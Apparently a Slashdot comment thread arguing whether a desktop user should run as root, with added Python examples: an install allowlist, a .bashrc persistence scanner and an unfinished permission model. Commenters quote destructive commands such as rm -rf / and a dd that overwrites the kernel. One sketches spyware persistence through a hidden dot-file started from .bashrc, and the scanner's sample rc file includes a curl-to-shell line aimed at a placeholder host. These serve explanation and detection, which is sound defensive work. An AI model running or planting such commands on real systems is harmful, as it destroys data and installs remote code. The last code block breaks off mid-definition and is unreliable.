Your computer has a whole bunch more potential states of configuration and execution. Just assuming ten programs that may or may not be running at a given time, right there you've got 1,024 states. Then there's the state of each of those programs - say each program is not just running or not, but can be in one of five states (which is not unreasonable - not running, loading, reading, writing, and closing). Now you've got 5^10=9,765,625 possible states for your system to be in. Six orders of magnitude more complex than the elevator. Then assume a few variables of configuration - just ten binary values would take us up to ten billion states. (And that's assuming only ten programs - right now ps -ax | wc says I've got over 100 processes running.)
It gets worse if you take a finer-grained view of what a state is - the RAM in your system can assume more states than the number of elementary particles in the Universe.
Of course in theory, our operating system partitions that complexity, so you only have to deal with the states of one program at a time. And one way it does that is by separating user privileges.
Tom Swiss | the infamous tms | my blog
You cannot wash away blood with blood
Windows 98 has no concept of root.
Win98SE without IE and Netbios over tcp/ip is pretty secure. Neither the wife's nor the kids' machines have ever been compromised. Granted, we run ZoneAlarm on both machines and I don't allow the kids to download/install programs without permission (active network monitoring is in place).
Still, I wouldn't recommend any user to run an internet connected computer as root. If I were a malicious person I could craft an XPI to own a linux box. It'd be just a matter of waiting for some clueless Luser to click on 'OK'.
Personal gripe. The mozilla foundation needs to sign certified/sponsored XPI's. If the XPI is not signed, the installer dialog box should be RED and consume 75% of the screen. They could also turn this into a revenue stream if they certify plugins for a small license fee to third parties. My opinion and I digress.
Enjoy,
It's just the normal noises in here.
If you are running in a multiuser environment with possibly untrustworthy or inexperienced users then yep, not having them all have root privileges is a hell of a lot safer. It protects the users' privacy, avoids other people deleting each other's data, be it by intention or accident or whatever.
In a home environment with just one user, who also happens to maintain the machine, it's however a whole different thing. All valuable data there is stored in $HOME anyway, so gaining root helps nothing to destroy valuable data, nor does it help with preventing spying of credit card info and such. Last but not least, switching from the user who maintains the machine to root is also rather trivial for some evil program: either wait till 'sudo' is unlocked or install a trojan 'su' binary in the path or just listen to the X11 key events; sooner or later everybody will end up typing his password in on a self maintained machine. There are still a few things left like accidentally 'dd'ing the harddisk with zeros or such, which are more or less prevented by not running as root, but then if you are dd'ing around you are probably running as root anyway. It might also help in making it impossible to accidentally delete other partitions like the Windows one. But there is really not much for which not running as root protects you on a single-user machine; the benefit is far more in that it clearly separates the user's data and the application data, so that programs don't end up storing user data in 'C:/Program Files/SomeApp/' like many do under windows, but in that they are forced to store in $HOME.
So should one run as non-root? Yep, last but not least because a bunch of programs simply refuse to run as root, which would be quite annoying. But one shouldn't really have any illusions that one gains any kind of real advance in security in a single-user environment.
Basically, his point is that users care about their data and running as root vs not offers no such protection. Michael's solution is to throw up his hands and give up such security completely. Why not, instead, embrace the root model to protect user data just as your system critical libraries are protected?
The ability to do so is already in the system: just create a different user. But I don't want to run Openoffice, et al, as a different user.
In large coding projects, CVS/SVN/etc are used to maintain version integrity. Here's a thought: integrate svn or cvs into the GUI. When a user is asked to save a file, it prompts them for a password, they enter and voila (modify the APIs for Xwindows et al so that individual apps don't even need to know). Security. Additionally, since you're using version management, it's now possible to revert to previous versions of documents -- hard drive space is so cheap nowadays compared to file sizes (50KB for a spreadsheet) why not combine both technologies? The key is merely integrating the technologies into the GUI. Not that this is easy, but I see no reason why it's not useful (I have dozens of different versions of most everything lying around, just in case).
Essentially the entire comment thread has been Robertson bashing which is good -- since his conclusion is ultimately wrong -- but no one seems to want to offer up a solution to the one good point he makes.
-- Political fascism requires a Fuhrer.
...that is the question. As somebody who's actually deployed many Linux systems for Joe Sixpack, I can say with a great deal of honesty that when you tell them that they can't break the system as long as they're not in root, they damn well don't log into root unless it's for something important. Most users are afraid of breaking their systems anyway, so if they see a clear cut divide between what's safe and what isn't, most will willingly choose to err on the side of safety. As a result, I've never seen any of those boxes compromised in any way.
Call me a troll, but I think that if Linspire wants to try and be a "better Windows", they're going to find that you can't beat the original, no matter how crappy it may be. On the other hand, if they strive to be a "more consumer palatable Linux", they should probably consider actually addressing Linux's weak points rather than ignoring its strong ones (like security).
-AT
Working in a DevOps shop is like playing in a band made up entirely of keytarists.
I know it's not secure to log in as root, but many users are driven to do this because of how restrictive Linux security is.
I mean you need to type the root password just to connect your modem, or change the clock time. Is this really necessary on a single user desktop?
You can either be secure by design and implementation.. (OpenBSD), or you can be secure by piling up difficulties in the way... (Windows XP SP2 + Norton Antivirus etc).
Not using root is in the second category. Even OpenBSD has all services disabled by default and many Linux distros are enabling iptables to close most ports by default, both of which fall in the second security category. Ideally, the first category would be enough. In real life, you need both the good design and implementation, and the second security layers because nothing can be 100% secure. Even if it was 100% secure, the human error always exists, which is undeniable.
So in theory root is secure, as long as you're perfect, your passwords are extremely difficult, and your OS something like OpenBSD, or like OpenVMS for the VAX, which very few hackers would even want to learn to hack. But in real life, stay away from root.
"Give orange me give eat orange me eat orange give me eat orange give me you." -Nim Chimpsky
My reaction? It's about time! This will help far more than any "Trusted Computing" initiative will.
Now before I continue, I'll comment that my workstation/gamestation is a Windows XP SP2 machine. My web services machine is a Debian Linux machine.
I have two accounts on my XP machine: One Administrator and one Limited User. I use the Limited User Account on a day to day basis for my classwork, Applications, and Games. I use the Administrator account to install new programs and program updates.
The biggest problem with a LUA policy on a Windows system is... Application manufacturers. Programs tend to be written with the impression that the program directory and HKEY_LOCAL_MACHINE part of the registry is always writable. Unfortunately, this is undoubtedly because Windows 9x didn't have the concept of file or registry permissions.
On XP, by default, Limited Users can only write to their Profile directory on C:, and can only write to the HKEY_CURRENT_USER part of the registry. These are where user specific files and settings belong! The %USERPROFILE% and %APPDATA% environment variables are even set up for them! There's even an %OS% environment variable that tells the installer that this is a Windows NT system (It's set to Windows_NT).
The most recent offender for ignoring these restrictions, that I've installed, is World of Warcraft. Since it was written in 2004, its installer is aware of accounts and account types, and gave me an error that I needed to install it as an Administrator. That's all well and good, but it still tries to write files to the %ProgramFiles%\World of Warcraft\WTF\Account\[USERNAME]\ hierarchy every time it runs. While the game seems to work even if it can't write its files, you also can't save any settings changes.
GLaDOS for President 2016! "Well here we are again. It's always such a pleasure." -- GLaDOS, 2011
What kind of knucklehead would let his CEO have root?
Honestly, the boot process should be an admin account anyway, and can hand it off to another user process. Most home computers can be considered physically secure, and so merely booting (or clicking on your icon) should be enough to get to your account. Windows actually does this right.
As for how to handle admin type functions under a GUI without incessant PW prompting: give the GUI escalation privileges, but not programmatically. I.E., I click on a Disk Format icon, it runs as admin, but there would be no exposed API to be exploited automatically. The boot process could hand off limited admin privilege to the GUI, but this requires trusting your software. I guess this is too difficult for people to grok...
just how in the hell am I supposed to be able to add/remove/manage/defrag/update/etc if I'm not admin. I've tried it, on machines at school, the simplest things require admin rights. updating a freaking flash plugin you must be admin.
I'd be logging off and on every day if I weren't a user in the admin group on my home windoze pc.
I don't think it's realistic to be non-admin on windows, and I wonder how y'all do it on *nix.
In addition to the 1000's of reasons above, imagine how boldly Michael would defend this insecurity ideology if he walked away from his box and his 8 year old child decided to play around on the computer. The computer with all his financial assets, personal e-mail, business contacts, music, etc. I don't trust anyone with my data, and I'll be damned if I am going to give my kid a leg up in kicking me down.
However, your applications are also important.
Run as a user - you can only lose your data.
Run as root - you can lose your data *AND* your programs.
Programs can be reinstalled, sure. So can data, by this amazing technology called *backups*.
Plus, if you run as root, there's the potential that every other user on the machine has *their* data compromised as well, through your own incompetence/mistake/spyware, etc.
There's also the possibility that, when run as root, changes may be made to your system that you will not notice. Random example - let's say I build a trojan to modify your C library to install a backdoor into any code you *or any user on your system* link against it?
How about I modify your e-mail client's binary to silently attach copies of personal documents to any email it sends out?
You may not notice, until it's too late. There's FAR more damage that can be done with root access than not - and it's not *just* about restoring from backup.
smash.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
Making the root user the default is fine, because absolutely none of the things you mention matter unless there's also user backup by default, or user management by default. (Hint: for desktop apps, there isn't.)
I don't run as root because I don't want to do anything to my system setup by accident. I like to try out new stuff which isn't likely to nuke my data, but would think nothing of polluting my /usr.
But I don't think for ONE SECOND that I'm actually more secure that way.
If we want Unix security to mean anything, we have to do it with software. If you were serious about your ActiveX thing, we'd be running Firefox's gecko and javascript support as user "nobody". We'd have the "secure by default" distros let us play games, but only give the games access to their own config data and savegames.
This kind of thing is only feasible with massive distro-wide support, and becomes much more feasible with Namesys' ideas on filesystem "views". But it's still not foolproof.
To summarize: Don't run as root, but don't think that makes you so much more secure/sane. It's a lot less like seat belts and a lot more like adding a bit of tissue paper on top of the seat belt, in case said belt should fail. If you crash and your belt fails, you WILL fly through the window, tissue paper or not.
Don't thank God, thank a doctor!
"What's the most important thing on your desktop? It's the data."
Right. THE data. Not just YOUR data, but EVERYONE ON THE MACHINE's data. If you do something stupid as a regular user, you're only risking your own data. If you do something dumb as root, you can wipe out your whole family's data. Won't somebody think of the children!
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
That's right, the time has come for all those who are willfully ignorant and cognitively challenged to stand up and tell those know-it-alls, "I'm not going to take it anymore!" If you're a lawyer, CEO, advertising exec, accountant, fifty year old receptionist, psychologist, middle manager, celebrity, or an elementary school teacher, and you're sick of being pushed around by underlings just because they happen to have a clue, it's time for you to join an organization that understands your special status in society and your immunity from conscious, rational thought. Call 1-800-ASSHOLE and ask for a copy of the pamphlet, "The Power of Claiming You Know What the Hell You're Talking About When you Clearly Aren't" and ask about membership in Militant Idiots United. Thank you.
I think that the target audience for Linspire is the average Windows user who sees no problem running everything as root.
Coder's Stone: The programming language quick ref for iPad
From time to time I help my grandmother and my girlfriend's aunt out with their windows boxes. Both of them are pretty clueless as far as computers go, and I suspect that they could really get into running as a user and not as root. Especially when they were first getting started, and even now, they both have expressed a fear of fucking up their computers. If I/this guy could tell them why it's in their benefit, ie that as long as they don't enter the root password, they can do whatever they want and they never ever will have to worry about their computer breaking, I would imagine both of them would sign up really quickly.
The solution here isn't in dumbing things down. It's in giving a 1 minute presentation about the *nix security philosophy during the first login. I would think that most people, and ESPECIALLY newbies, would get behind that type of security if this guy would take 30 seconds to explain what it is and why it HELPS them instead of just portraying it as a nuisance. In many ways, logging in as a user really does give you a freedom to explore and learn pretty risk free. People know that there are ways to break their computers. Telling them to go ahead and press any button you want to; if it's a button that will do something serious, it will make you enter a password would probably be attractive to most people learning an unfamiliar OS for the first time.
Corporations have often built functionality around ActiveX. They need to migrate existing functions to the new products they are trialing or integrating into their systems. Not everyone can do a straight cut over you know.
I would like to point out that with a bit of effort, unix protections can protect a user's data as well. For example, in web-directories, grant the HTTP user only read access to the files. Database files (at least for Oracle and PostgreSQL) don't need to be accessible to the users at all. Chroot offers further levels of protection.
For example, I run a web-server with an "apache" user. The user is chrooted, and there is no rm command available to apache, the logs are just pipes, and they point out to a mount point apache can't directly access. The only files available to poor apache are the program files and the files in the web-root. An attacker could work for days, and end up with access to exactly what the web-server was exposing in the first place. Compare that to running apache as root with a few badly-written CGI scripts (third-party, naturally!) to be exploited!
Ideally, the system would suspend the application while the user received a descriptive message of what the program was trying to do, at a high level. The administrator could then configure the app by running it with no privileges initially, but clicking "Allow Always" for each allowed operation, exercising each feature of the program that the users need, then capture that configuration and apply it to all users.
Users could (if allowed by their own account) also grant privileges (up to what their account had) for functions the system admin may have neglected to exercise. However, they would probably soon get annoyed by clicking dialogs and ignore what they said, so admins would in that case do well to make sure the user had few privileges and the app was already preconfigured properly.
The "force" option is the worst thing to happen to Windows security, EVER. 99% of the time, you're asking the user to say "Yes, I'm sure I want to do what I just fucking told you to do." The other 1% of the time, you're asking the user to say "Yes, I want to be rooted."
For instance, what user actually reads and understands the SSH warnings about host keys? Hardly anyone.
Probably 60% of users just type "Yes" right away. These are the people who would just click "OK" to dialogs that say "Do you want to allow hardcorepr0nspyware.com to install software on your machine?"
Probably another 20% actually read it, decide that they don't understand what it's saying, and type "No", because they don't like to agree to things they don't know about. These are the kinds of people who say "No" to the browser warnings about sending information over the internet. You know the kind -- they come up whenever you type a search query into Google.
The other 10% actually go read the docs to understand the message. Actually, 10% is a bit over-optimistic, but we're talking about ssh, after all.
The same thing has happened to legal licenses. Since we aren't all lawyers and software engineers, we generally click through warnings from software and click/sign licences without a second thought.
Creative Commons has a good start on the legal front, and the shell is a good start on the software front. When we design any system, we should only force interactivity where it's absolutely needed, and explain it SIMPLY to the user.
Does this by default.
*ducks*
rm -rf / usr/local/src/myjunk
Then there's the one where you put a file with the same name as a system command in a user directory....
I'm afraid that some of us who are old enough to rmember why we learned not to run as root are old enough that we're starting to forget things.
cd /
rm -r *
Those who have experienced such a thing can't post on Slashdot. Let's face it: Slashdot is biased against the dead.
...for a younger sibling/child to wander up to your box and type: dd if=/dev/null of=/boot/vmlinuz In seriousness though, he almost makes a good point by saying that anyone compromising the account has access to whatever's in your $HOME anyway... but surely anyone would realise that it doesn't mean you can just give away access to the rest of the system as well?! It's almost like inviting people to start installing rootkits and suchlike...
The guy's not a techie. QED.
Root has full authority over the system. Root programs that are exploited also do.
The idea was/is to make it impossible for a user to become root without going through the proper mechanisms. (su, setuid, group wheel, etc...)
In the OLD SCHOOL days it was an open challenge to see if a user account (student account) could even crash the system or get root access. Few would succeed. This was when there would only be 1 or maybe 2 computers on the whole school campus. Pre-networking days.
Something us SVR4 and BSD folks understood, but many Linux guys totally miss the point of why we do things a certain way.
So if a user account or program is compromised, it is like being on a ship with watertight bulkheads and steel hatches that lock shut, preventing the whole ship from flooding and sinking.
If a user account becomes compromised, as root you can still get in and fix it, completely!
If root is compromised, you probably can't even get in, or tell if you've been compromised. This is really bad when you don't have physical access to the BOX. Like when it's 10,000 miles away. ( I have actually been on boxes, as a hacker as well as root, when my adversary was on at the same time )
In a partly compromised box, as the hacker that had gained a user account, one cannot fix up logs (*to cover one's tracks*), is restricted to IP port services above 1000. (this is why we use 8080). Cannot add a NEW IP address, send Raw packets (spoofing), or sniff the network.
They cannot alter other users' accounts. So if a web CGI gets compromised they can't tag the SITE!!.
I can go on and on, but I hope you get the point. Root and USER accounts exist for some very good reasons. Layered security.
But it only works when you make your OS correctly. ( see FreeBSD, or OpenBSD for an example )
Root vs. non-root doesn't matter! Data is king (and it's in a non-root account) and everything else can be re-installed. Additionally, if you back things up, your data is safe -- at least from being lost. In the end, your privacy is all that is at risk -- and that resides in a non-root account.
Silly Linux boys...
In order to make it easier on the users (ie no passwords and such when installing new software) why not do the following:
Instead of running the user as root and allowing them to install any god forsaken program there is why not give them a regular account. Then when the user wants to install something they click on it and the Linspire package managing software connects to a Linspire database where the program is checked against a white list. If the program isn't on the white list tell the user that the program can't be installed because it is most likely a virus or spyware. Then give the user a help number to call if they still really want to install it and let people help them out.
Now, if the program is OK to install, Linspire queries its user database for your product's root password and then fills it in and voilà, the program installs.
A shortcoming is that you might not be connected to the Internet, but, IMO, it's pretty safe to assume that someone buying a new computer is going to have Internet access as well. Just a thought.
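Added example, not Linspire's code and not from any comment in this thread: a hash-based install allowlist of the kind the post above proposes. The package bytes, the allowlist entries and the help-line number are constructed for illustration, and the step that would then hand the installer the root password is left out. Two things the prose does not spell out: the decision is keyed on the SHA-256 of the package contents, not on the file name a download happens to carry, and the check fails closed when the allowlist cannot be reached.

```python
"""Hash-based install allowlist (added example; packages and list are constructed)."""
import hashlib

HELP_LINE = "1-800-555-0100"   # made-up help number, not a real one

# Constructed packages as they would sit in the download directory.
# The second entry has the same file name as the first but different contents.
PACKAGES = {
    "cool-screensaver_1.0.deb": b"\x1f\x8b screensaver payload (vendor build)",
    "cool-screensaver_1.0.deb#popup": b"\x1f\x8b screensaver payload + dialer",
    "photo-editor_2.3.deb": b"\x1f\x8b photo editor payload",
}

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# What the vendor database answers: digest -> human-readable package identity.
# Built here from the known-good build only.
ALLOWLIST = {sha256_hex(PACKAGES["cool-screensaver_1.0.deb"]): "cool-screensaver 1.0"}

def fetch_allowlist(online: bool = True):
    """Stand-in for the network lookup; None models 'no connection'."""
    return ALLOWLIST if online else None

def decide(filename: str, data: bytes, allowlist):
    """Return ('install', identity) or ('refuse', reason)."""
    if allowlist is None:
        # Offline: refuse rather than install something nobody has vouched for.
        return ("refuse", "allowlist unreachable; refusing to install unverified software")
    digest = sha256_hex(data)
    if digest in allowlist:
        return ("install", allowlist[digest])
    return ("refuse",
            f"{filename.split('#')[0]} is not on the allowlist and may be spyware; "
            f"call {HELP_LINE} if you still need it")

if __name__ == "__main__":
    for name, data in PACKAGES.items():
        print(name, "->", decide(name, data, fetch_allowlist(online=True)))
    print("offline ->", decide("photo-editor_2.3.deb",
                               PACKAGES["photo-editor_2.3.deb"], fetch_allowlist(online=False)))
```

The "#popup" entry is the case that matters: a download that calls itself cool-screensaver_1.0.deb but was built by someone else hashes differently and is refused, even though a name-based list would have waved it through.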
Obligatory FUD debunk, or just helping a troll.
You have been trolled.
And way to blame the fact that YHBT on Bill Gates. That makes a lot of sense.
Once on a Solaris 2.6 box rented at a high price by my employer for me to port its product to this OS. I wanted to remove the files I had used to install something so I just typed "rm -rf *"; after a few seconds, I realized that there were lines of text scrolling on the screen saying that it wasn't able to delete /dev/*something*, and by the time I had killed the process, the system was no longer usable. I had to spend four or five hours rebuilding the deleted parts after booting from a CD.
Using root is not a problem in itself, it just makes the problems related to your mistakes far far worse.
I just gave it a shot (FC3) and it won't let me browse /home/bob/ if /home/ is chmod a-x, even if /home/bob/ is chmod a+x.
Even typing "cd ~" as a normal user gives me "-bash: cd: home: Permission denied".
Yes, it's a bit less convenient, and it may be a hassle to put on, and maybe your passanger needs to reach something so they unbuckle themselves for a minute... but it can be the difference between Bad Stuff and Really, Really Bad Stuff.
Or the only way to be sure that my firewall blocks all nasty stuff that I might run locally (Ohh, annakounikova.exe!) is to run as non-root? If I run as root, a malicious script can change the firewall rules, and compromise my data (I mean, let someone else than me have access to it remotely.)
Yeah, sure, whether I run as root or not, a malicious script can destroy my data, but I have backup, and if my firewall is set correctly, I won't have it stolen.
Now, if the firewall is on another machine, well yeah, running as root or non root makes no difference (for a single user machine).
Look, here's the bottom line as far as running as root. If my grandma is using her computer, and she can't run the programs that she wants to, she gets aggravated, and if it doesn't work she will most likely give it up. And there is one less user. Sure, it is definitely much better to run as a normal user, but if the software DOESN'T WORK, it really is pointless. If the O/S can be intelligent enough to consistently ask for a password in an intelligent manner, then perhaps it would be acceptable to the normal user. However my experience in both linux and in windows is that, for many programs it just doesn't ask, and then proceeds to not work. And to top it off, the root/Administrator accounts should have a secure password, and as such, are usually long, and difficult for the average user to remember, and if nothing else they are a complete pain. Sure, I don't run my Linux box as root, but I do run my windows machine as admin, because simply put MANY, MANY programs REQUIRE that in order to work properly. Is it right? No. But that is how it is for the moment. I definitely agree that it needs to change, but you have to realize that the average ex-windows user has NO clue what root is, and doesn't want to be bothered with a password prompt every time he wants to change his background.
I dont' think ANYONE understands what ActiveX is, least of all, the programmers at Microsoft.
Correction: replace "executable" with "readable".
chmod a-r /home/, and user bob executing rm -rf /home/ fails to eliminate a bob-owned /home/bob/, as it fails to get a listing of /home/
From the article:"I DO see it's an added pain in the ass when grandma tries to change her wallpaper, and it tells her "you don't have root privileges"
No, I don't think Grandma should learn about privileges to change the desktop wallpaper, you elitist grandma-hater!
Michael Robertson isn't very "linspiring" as a CEO of a software company. He hasn't really thought this through, has he?
Let's think about the kinds of data that might exist on a computer:
The data you already have
The OS, application programs and configuration
Other peoples data
Data you may create in the future
Running a vulnerable program as a user exposes the data you already have to damage, so only one of the four categories is at risk. But running it as root means that all your system setup and any other programs also cop it. And even better trojans and rootkits can be installed on your system so all your future data is also vulnerable.
If I'm going to have a disaster I'd prefer it to just screw me over once rather than make my entire life a misery.
I dare you to try this. Dare.
Not that I've tried it recently, but I think I did this a year or so ago (by accident) as non-root. I didn't lose any data whatsoever, since so many error messages began to get printed I hit Ctrl-C before it ever got to /home. So yeah, I heaved a huge sigh of relief.
Or maybe that was just a weird dream.
the article mentions Grandma wanting to change desktop wallpaper. She is not going to know anymore about the attack if she's root or non-root. I think that is true for the vast majority of desktop users, who are lucky if they even know someone who can use that information. They also never run MySQL, do rm -Rf /, or any of the other things mentioned in the original post. duh!
"I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer.
PRINCIPLE OF LEAST PRIVILEGE
One word: Spyware
Where is the problem in creating spyware that runs as user? Simply write the binary as a dot-file to the home directory and append a call to .bashrc. Same goes for software that turns the computer into a spam-spewing zombie.
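Added example, not part of the comment above or anything else on this page: the detection side of exactly that trick, a scanner that reads a shell rc file and flags lines that start a hidden file under $HOME or pipe a download straight into a shell. The rc content below is constructed, the home path is an assumption, and the two rules are a starting point for a scanner rather than a complete one.

```python
"""Flag .bashrc persistence of a hidden binary under $HOME (added example; sample rc is constructed)."""
import re
import shlex

HOME = "/home/alice"          # assumed victim home directory

SAMPLE_BASHRC = """\
# ~/.bashrc
[ -z "$PS1" ] && return
alias ll='ls -alF'
export PATH="$HOME/bin:$PATH"
~/.cache/.xsession-helper &
nohup /home/alice/.config/.gvfsd-helper >/dev/null 2>&1 &
(curl -s http://example.invalid/x | sh) &
source ~/.bash_aliases
"""

# A path under the home directory whose last component is a dot-file.
HIDDEN_IN_HOME = re.compile(r"^(?:~|\$HOME|" + re.escape(HOME) + r")(?:/[^/\s]+)*/\.[^/\s]+$")
# Dot-files a shell rc legitimately sources; everything else hidden is suspect.
KNOWN_RC = {".bashrc", ".bash_profile", ".profile", ".bash_aliases", ".bash_logout"}
LAUNCHERS = {"nohup", "exec", "source", ".", "setsid"}

def is_suspicious(line: str) -> bool:
    line = line.strip()
    if not line or line.startswith("#"):
        return False
    # Rule 1: network fetch piped straight into a shell.
    if re.search(r"\b(curl|wget)\b", line) and re.search(r"\|\s*(sh|bash)\b", line):
        return True
    try:
        words = shlex.split(line.rstrip("&").strip(), comments=True)
    except ValueError:
        return True                      # unbalanced quoting: look at it by hand
    if not words:
        return False
    # The program being run is the first word, or the word after a launcher like nohup.
    cmd = words[1] if words[0] in LAUNCHERS and len(words) > 1 else words[0]
    # Rule 2: that program is a hidden file under $HOME and not a normal rc file.
    return bool(HIDDEN_IN_HOME.match(cmd)) and cmd.rsplit("/", 1)[-1] not in KNOWN_RC

def scan_rc(text: str):
    """Return (line number, line) for every line that trips a rule."""
    return [(n, l) for n, l in enumerate(text.splitlines(), 1) if is_suspicious(l)]

if __name__ == "__main__":
    for n, l in scan_rc(SAMPLE_BASHRC):
        print(f"{n}: {l}")
```

On the constructed file this flags the two backgrounded dot-files and the curl-into-sh line, and leaves the ordinary `source ~/.bash_aliases` alone. Note that nothing here needed root to plant or to find; the same scan run against every user's rc files is the kind of check that only a separate, privileged account can do on a box where the user account is already compromised.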
He does have a good point. The separation of root and user on single user machines is greatly overrated. It would only make a minor difference if a root-only software firewall were to block some outgoing connections, e.g. SMTP. But as is, the damage root can do is only slightly more than the damage a user can do - not to mention that root exploits are not uncommon.
The only good reason to run as root:
1) Your name is root and you're very surprised Linux was able to figure that out without you telling it.
2) Your s,u, and d keys are broken.
For all the talk about it, I don't think I've ever actually known anyone to do the classic accidental rm -Rf / as root.
I see about one disaster a month where a user toasts their own files. Over the years I've seen three servers destroyed by an admin doing an rm -rf . in the wrong directory (and heard a number more). I've heard second-hand of a million-dollar typo of someone on an admin server with a whole division's NFS directories mounted root-writable.
Statistically, I've concluded that any given person, regardless of intelligence, has a slightly more than one-in-a-million chance per day of doing a potentially machine-toasting typo.
Do you know how incredibly easy it is to have a Windows system infected?
You know, I've been running Windows systems for thirteen years now, and DOS ones for five years before that, without a single virus, worm, trojan, spyware, or other infection. So my answer is, "it's not easy at all if you have a clue."
Which, apparently, your friends and relatives don't have. They've been running IE and OE, I assume. They haven't had a hardware firewall between themselves and any IP connections, either. And they've run files they've downloaded or borrowed on a disk or found attached to their email without first having Norton or MacAfee look at them.
So, my question, is it that they've ignored your warnings, or is it that you haven't given them the necessary clue?
The reason Linux will never have the same problem with spyware, trojans and worms is because of most distros setting up the main account as a normal user, not root. So, once linux gets more popular and hackers start writing more tools to hack linux boxes, guess who the much easier target will be... people running Lindows.
See, your rant was blown out of the water... you are just plain wrong.
Meh.
I can understand the confusion, but the full rule is: Don't use root for normal use drunk.
My one-time boss did. He typed rm -rf /tmp/somedir, except his thumb accidentally bumped the space bar after the first slash and he didn't notice until after pressing return.
After that, I got the job of sysadmin...
+5: The Only Post This Story Will Ever Need
if such a mod exists...
I would like to say I never had to be root to change my wallpaper
Also - it is about data - if you have root privileges you can view everybody's data on the computer.
That is not good - I think he is still living in the microsoft windows 95 world when there was no network and the pc was just that, a PERSONAL computer. Today it is a multifunctional device that needs privilege escalation and de-escalation.
Way back when I was a high school student, the "system admin" at my school used to log in to the school's mail server as root and just leave his terminal window hanging open. One day I had somebody else distract him while I walked into his office, copied /bin/tcsh to my home directory, set the sticky bit on it, and left. Oh, the fun we had after that!
Of course, he didn't learn...
fat finger something like:
rm -rf /var/log/*.gz
and turn it into:
rm -rf / var/log/*.gz
and you'll quickly find out why root is not to be used all the time.
Why read the article when I can just make up a snap judgement?
I SAID that sudo can do that. But Linux by default doesn't ship with that as "how you make yourself an admin user"
Except Ubuntu apparently does, which rocks and I just didn't know. Hopefully this is the start of a trend - a trend I'm trying to push along a little bit.
The strength of security levels that is provided by file permissions and non-root access shine forth in heavily multi-user environments for which unix was designed.
When many people use the same system, we usually want to give them means to protect themselves from each other, and the system administrator wants to protect the base system from the users. The idea is to make your environment safe from other users with legitimate access to the system.
Single user machines found in most homes need only protect the user's data. As mentioned in other posts, the system really isn't all that important--it's not a server system whose uptime is critical; if it breaks, pop in the install disk and fix it. What's really important are the person's files, which they themselves already have unrestricted access to. When security for their account is compromised by sneaky means, the data is vulnerable whether they are root or not.
In any case the user always has the risk of contracting spyware or file damage, but non-root usage helps ensure that one user compromising himself has the least potential for leading to the compromise of other user accounts. If Billy Bob runs the wrong script, he may have to suffer data loss or theft, but the other users can breathe easy because he is not root.
On a home system, however, there is only Billy Bob, and there is nobody else for him to be protecting. If he runs as root, he seems no worse off than he was before.
Seriously, how can the CEO of a Linux-oriented company say something like this. He's either:
a) managed to avoid listening to his engineers,
b) got them cowed into telling him only what he wants to hear, or
c) he's found the most clueless engineers on the planet to work for him (did he hire people from Microsoft, or what?).
I think he's hearing rumors that people are criticizing Linspire for running as root and they are thinking about changing that, but honestly can't figure out why it's better to not run as root. He wants a list of reasons for the marketing of their new "secure" version of Linspire.
Well, I for one am not helping with this, he can do his own homework, I'm not letting him copy mine.
After having run Mac OS Classic since 1992 - and always on Powerbooks - until Jaguar, I have to say, Hey, I ran my own machine! I could do anything I wanted with it! It was my responsibility!
I understand the power of Root, but as a writer who works on her very own Powerbook, I am Up To Here with permissions. They have no meaning in my life whatsoever, except as the constant price I do pay for using OS X.
What you have here, fellas, is - gasp - only a Point of View. Mere mortals have been in charge of their own machines, free to run riot through the OS thereupon. The world has not ended.
Have a point of view, but for god's sake, know so. I don't screw around with the 'nix underpinnings (much) . . but it is my computer.
Apple fucked up PNG support too. I've just spent the last three hours dealing with this major annoyance. The humorous upshot: I had already frozen the blended layers to each other so the png-pointing style sheet goes to IE and I had to make a special jpg-based one for safari. Sheesh!
Running as root is unsafe GENERALLY.
However, there are two scenarios that lessen this vulnerability tenfold
1) with a strong enough root password, 128 characters, mixed case alphanumeric for example, it would take either a GOD or a supercomputer hundreds of thousands of hours to break into your system, assuming your "normal" user accounts are set up similarly.
2) assuming the above is true, WHO THE FUCK IS GOING TO EXPLOIT THE PROVERBIAL "vulnerabilities/exploits".
You guys are a bunch of fucking n00bs. get a life for fuck sakes.
That's the best way I've seen that said yet, and I'll add that there are many adults for whom it's just as dangerous, whether it's linux or windows.
Robertson is talking out of his ass.
Ignoring it and hoping it goes away is not the right answer, either
It is for me. I use Macs and Linux. If someone wants to make money from me through my web browser, they had damned well better do it using technology I can use. I won't be your customer unless you support my platforms of choice.
I used to be a web developer. If one of our clients wanted some fancy single-platform buzzword technology just because they thought it was cool, we'd ask them if they'd rather be "cool" or reach 5% more customers. Guess which one they all chose?
If the X% of people use Mozilla, then that's all the more incentive to develop sites that work in Mozilla. I do not want anything to remove that benefit.
I *am* root.
Firstly: That is a reason for others to discourage the use of root. That is not a reason for me, as a user, to not run as root. I am talking in terms of what the user cares about. There is no reason for the USER to be concerned about that.
Secondly: That is also more an argument for external firewalls. You should never have your network protected only by rules on the box you're trying to protect.
Thirdly: spammers don't require root. Specific spammers require root for specific transport methods due to specific outdated conventions which make no sense at all in a desktop environment.
The thoughts themselves:
Sure, you dont want someone to gain root access, but you don't actually want them to have any access at all. If due to a convention that you've compiled in, blocking root access means making a handful of specific exploits not be able to work once you've already been infected, that's not really such a great thing to shoot for- You're still just as infected, and the infection is what you (as a user) want to avoid. Who cares about the effect (as a user, not as a peer of the infected)?
You're still just as fucked if someone gains access as non-root, even if a handful of people won't be interested. Hey, if I compiled in an option that said you needed to be logged in as micheal in order to access the ports I use for DCC send, I could block anything which uses those from being useful after I'm infected.. and if I block the ports I use for printing if you're not logged in as bixbie... and for mysql if you're not logged in as bilbzerobaggins...
But you fail to see that those developers won't develop using FireFox, they'll just keep using Internet Explorer, as it clearly satisfies their needs. Those same developers also won't develop ActiveX for FireFox, because they won't see why they should do this.
as per this comment below (just bringing it up to make it more obvious). chmod a-x /home keeps you from doing anything in /home or any subdirectory, but will let you list /home; chmod a-r /home keeps you from listing /home but will let you do stuff in /home/bob.
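Added example, not from any comment on this page: a small Python model of the directory rules behind the three observations above (the FC3 test where `cd ~` fails once /home loses x, the correction that `rm -rf /home` as bob stops at the listing once /home loses r, and the summary just above). It evaluates the rules for one non-root user whose effective rwx bits on each path are given directly, so the result is the same whoever runs it (on a real box root bypasses all of this, which is rather the point of the thread). The tree and the modes are constructed.

```python
"""Model of r (list names) vs x (traverse/look up names) on directories (added example; tree is constructed)."""
import posixpath

R, W, X = 4, 2, 1

class PermModel:
    def __init__(self, modes):
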